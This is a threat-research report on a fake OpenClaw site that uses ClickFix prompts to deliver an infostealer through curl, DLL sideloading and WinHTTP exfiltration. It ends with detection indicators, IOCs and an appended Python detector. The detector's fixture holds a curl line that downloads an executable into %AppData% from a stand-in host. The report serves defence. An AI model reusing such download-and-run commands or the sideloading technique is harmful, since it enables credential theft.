Threat Research

Fake OpenClaw AI Tool Used to Deliver Infostealer via ClickFix Attack Chain

Overview

This report analyzes a malware distribution campaign leveraging a spoofed OpenClaw platform to deliver an infostealer payload. The campaign relies on ClickFix-style social engineering to trick users into executing malicious commands manually, bypassing browser-based security controls.

Once executed, the payload initiates a staged infection chain involving a loader, a masqueraded executable, and a malicious DLL deployed via sideloading. The final payload focuses on browser credential harvesting and data exfiltration over HTTPS using WinHTTP APIs, enabling stealthy communication with attacker-controlled infrastructure.

Initial Access: ClickFix-Based Social Engineering

The campaign uses a typosquatted domain designed to impersonate the legitimate OpenClaw platform. The website closely mimics the original branding and user interface to establish trust.

ClickFix is a social engineering technique where users are instructed to manually execute commands, effectively bypassing browser-based download protections.

Figure 1: Spoofed OpenClaw website (app-clawbot[.]org) impersonating the legitimate platform to lure users into initiating the infection chain.

Instead of providing a standard installer, the site redirects users to a ClickFix-style interface that instructs them to manually execute a command via Command Prompt.

Figure 2: ClickFix-style instructions prompting users to manually execute a malicious command, bypassing browser-based security controls.

Execution Chain

The infection chain is initiated when the user executes the provided command via Command Prompt.

Execution occurs in the context of the logged-in user, with no evidence of privilege escalation observed during initial stages.

Figure 3: Malicious command leveraging curl to download and execute the payload from attacker-controlled infrastructure.

The command performs the following actions:

  • Downloads a payload using curl
  • Writes the file into %AppData%
  • Executes the payload immediately


User → ClickFix → cmd.exe → curl → Loader → AvastSvc.exe → aswCmnOS.dll → Browser Data → C2

Following execution, the malware proceeds through a staged deployment:

  1. Initial binary executes as a loader
  2. Loader drops:
    • AvastSvc.exe (masqueraded executable)
    • Multiple DLLs, including aswCmnOS.dll
  3. The executable triggers DLL sideloading
  4. The malicious DLL is loaded and executed


Execution Analysis: Process Tree

Figure 4: Process tree illustrating staged execution, including loader activity and subsequent launch of a masqueraded executable.

As shown above, the process tree highlights the transition from initial execution to payload activation, confirming a multi-stage infection model.

The absence of a legitimate parent application chain and execution from user-writable directories further reinforces that the observed activity is malicious and not part of standard software installation behavior.

Defense Evasion: DLL Sideloading and Masquerading

The malware abuses DLL sideloading by bundling a legitimate-looking executable with a malicious DLL in the same directory.

Figure 5: Dropped files demonstrating DLL sideloading, where a legitimate-looking executable loads a malicious DLL from the same directory.

Due to Windows DLL search order behavior:

  • The executable loads the malicious DLL from the local directory
  • Execution occurs under the context of a trusted-looking binary

Additionally, the use of the filename AvastSvc.exe mimics legitimate security software, further reducing suspicion.

System Profiling

Before executing its primary functionality, the malware performs basic host identification.

It queries the following registry key:
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName


Figure 6: Registry query used for system identification, retrieving the host computer name.

This behavior supports:

  • Victim identification
  • Campaign tracking
  • Environment awareness

No advanced sandbox evasion techniques were observed in the analyzed sample.

Payload Execution: Malicious DLL (aswCmnOS.dll)

The file aswCmnOS.dll acts as the primary payload and is loaded via DLL sideloading.

The DLL serves as the primary execution component, orchestrating credential harvesting and command-and-control communication:

  • Initializing runtime components
  • Loading or decrypting configuration data
  • Executing credential harvesting routines
  • Initiating communication with the command-and-control server

This modular architecture enhances evasion by separating execution stages and reducing observable indicators per component.

Static analysis of aswCmnOS.dll indicates that execution is initiated through standard DLL entry mechanisms, followed by initialization routines responsible for loading embedded configuration data. Observed API usage and string references suggest a staged execution model, where browser targeting and network communication components are initialized sequentially.

Targeted Data Collection: Browser Credential Theft

The malware includes logic to selectively target browser processes, ensuring focused data collection.

Figure 7: Decompiled function used to identify browser processes, enabling selective credential harvesting.

Based on this logic, the malware targets:

  • Chromium-based browsers (Chrome, Edge)
  • Mozilla Firefox

Data of interest includes:

  • Stored credentials (Login Data databases)
  • Cookies and session tokens
  • Browser profile data

Selective execution minimizes noise and increases efficiency in credential harvesting.

Data extraction likely targets SQLite-based browser storage files, including credential and cookie databases commonly used by Chromium-based browsers.

Command and Control (C2) Communication

The malware communicates with attacker-controlled infrastructure using WinHTTP APIs.

Figure 8: Use of WinHTTP APIs for HTTPS-based communication with command-and-control infrastructure.

Observed APIs include:

  • WinHttpConnect
  • WinHttpOpenRequest
  • WinHttpSendRequest

These are used for:

  • Exfiltration of collected data
  • Beaconing to maintain connectivity
  • Potential tasking

The use of HTTPS (port 443) ensures encrypted communication, reducing visibility in network monitoring systems.

The use of WinHTTP enables the malware to blend with legitimate system traffic, reducing the likelihood of detection by security tools that rely on identifying anomalous networking libraries.

MITRE ATT&CK Mapping

The campaign aligns with the following techniques:

  • T1204 – User Execution
  • T1036 – Masquerading
  • T1574.002 – DLL Side-Loading
  • T1005 – Data from Local System
  • T1071.001 – Web Protocols

Mappings are limited to confirmed behaviors to maintain analytical accuracy.

Detection Opportunities

Process Behavior

  • Process chain: cmd.exe → curl.exe → %AppData%\*.exe
  • Suspicious parent-child relationships involving user-initiated command execution

File System Indicators

  • Executables and DLLs located in user directories
  • Presence of:
    • AvastSvc.exe outside expected installation paths
    • Co-located DLLs used for sideloading
  • Executables mimicking security software (e.g., AvastSvc.exe) outside standard installation directories

Defense Evasion Indicators

  • Unsigned DLLs loaded by legitimate-looking executables
  • Execution from non-standard directories

Registry Activity

  • Queries to system identification keys such as ComputerName

Network Indicators

  • WinHTTP-based outbound connections using default Windows networking behavior
  • Connections to newly registered or low-reputation domains

Behavioral Indicators

  • Access to browser credential stores
  • Cookie and session token extraction
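As an added example (not code from the report or its authors), the following Python replays constructed Sysmon-style process-creation events and a constructed file listing to implement two of the checks above: the cmd.exe → curl.exe → %AppData%\*.exe process chain, and a security-software lookalike (AvastSvc.exe) running outside its expected install path with a co-located DLL, as described in the DLL sideloading section. The event field layout, the sample paths, and the list of "expected install roots" are assumptions.

```python
import ntpath
from collections import defaultdict

# Constructed sample process-creation events: (pid, ppid, image_path, command_line)
EVENTS = [
    (100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    (300, 200, r"C:\Windows\System32\curl.exe",
               r"curl -o %AppData%\OpenClaw.exe https://example.invalid/OpenClaw.exe"),
    (400, 200, r"C:\Users\u\AppData\Roaming\OpenClaw.exe", "OpenClaw.exe"),
    (500, 400, r"C:\Users\u\AppData\Roaming\AvastSvc.exe", "AvastSvc.exe"),
    (600, 1,   r"C:\Program Files\Avast Software\Avast\AvastSvc.exe", "AvastSvc.exe"),
]
# Constructed listing of the drop directory (the Figure 5 scenario from the report).
DROPPED = [r"C:\Users\u\AppData\Roaming\AvastSvc.exe",
           r"C:\Users\u\AppData\Roaming\aswCmnOS.dll"]

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\")
EXPECTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")  # assumption
LOOKALIKES = {"avastsvc.exe"}  # names the report observed being masqueraded

def base(p): return ntpath.basename(p).lower()

def in_user_dir(p): return any(m in p.lower() for m in USER_WRITABLE)

def clickfix_chains(events):
    """Return pids of executables in user-writable dirs whose cmd.exe parent also ran curl.exe."""
    by_pid = {e[0]: e for e in events}
    children = defaultdict(list)
    for pid, ppid, *_ in events:
        children[ppid].append(pid)
    hits = []
    for pid, ppid, image, _ in events:
        parent = by_pid.get(ppid)
        if not parent or base(parent[2]) != "cmd.exe" or not in_user_dir(image):
            continue
        if any(base(by_pid[c][2]) == "curl.exe" for c in children[ppid]):
            hits.append(pid)
    return hits

def masquerade_hits(events, files):
    """Return (pid, co-located DLL names) for lookalike binaries outside expected roots."""
    hits = []
    for pid, _, image, _ in events:
        low = image.lower()
        if base(image) in LOOKALIKES and not low.startswith(EXPECTED_ROOTS):
            d = ntpath.dirname(low)
            dlls = sorted(base(f) for f in files
                          if ntpath.dirname(f.lower()) == d and f.lower().endswith(".dll"))
            hits.append((pid, dlls))
    return hits

if __name__ == "__main__":
    print("ClickFix chain pids:", clickfix_chains(EVENTS))
    print("Masquerade hits:", masquerade_hits(EVENTS, DROPPED))
```

The legitimately installed AvastSvc.exe (pid 600) is not flagged because it runs from an expected root, which is the distinction the file system indicators above rely on.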

Indicators of Compromise (IOCs)

  • Domain
    • app-clawbot[.]org
  • File Names
    • OpenClaw.exe
    • AvastSvc.exe
    • aswCmnOS.dll
  • File Path
    • %AppData%\

Conclusion

This campaign demonstrates a structured and effective infection chain combining social engineering and execution evasion techniques.

Key characteristics include:

  • User-driven execution via ClickFix
  • Staged payload deployment
  • DLL sideloading for stealth
  • Targeted browser credential harvesting
  • Encrypted C2 communication using native Windows APIs

The reliance on legitimate tools and user interaction reduces detection by traditional security controls, emphasizing the need for behavioral monitoring and endpoint visibility.

This campaign highlights the growing effectiveness of user-driven execution techniques in bypassing traditional security controls.

Contributors:

Siva Prasad Boddu

Pandurang Terkar

Rudra Pratap
